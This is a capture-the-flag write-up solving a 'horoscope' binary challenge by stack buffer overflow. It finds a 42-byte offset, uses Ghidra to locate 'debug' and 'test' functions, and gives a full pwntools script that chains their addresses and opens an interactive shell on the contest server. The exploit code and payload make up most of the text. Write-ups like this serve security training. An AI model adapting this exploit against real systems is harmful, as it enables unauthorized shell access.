Solved by: Taz34
Here we have a binary so the first thing i started to look for is to get a segmentation fault and we got it.
Now I started looking for offset so the offset multiple to be added is 42 i.e.
python3 -c "print('10/10/1999/10:' + '1'*42)" Hence the payload is: 10/10/1999/10:111111111111111111111111111111111111111111
Now we started looking at Ghidra, and we found a function “test” from which we can get a shell on target.
here we have a problem that we need to make this (temp == 1) conditon true. So, after going to other functions we found another function “debug”
Now we can construct the final payload as:
payload = b"01/01/2001/01:111111111111111111111111111111111111111111" + debug_fun_addr + test_fun_addr
hence the final script:
from pwn import * p = remote("horoscope.sdc.tf", 1337) payload = b"01/01/2001/01:111111111111111111111111111111111111111111" + p64(0x40096e) +p64(0x400950) p.sendline(payload) p.interactive()
now just execute this script to get the flag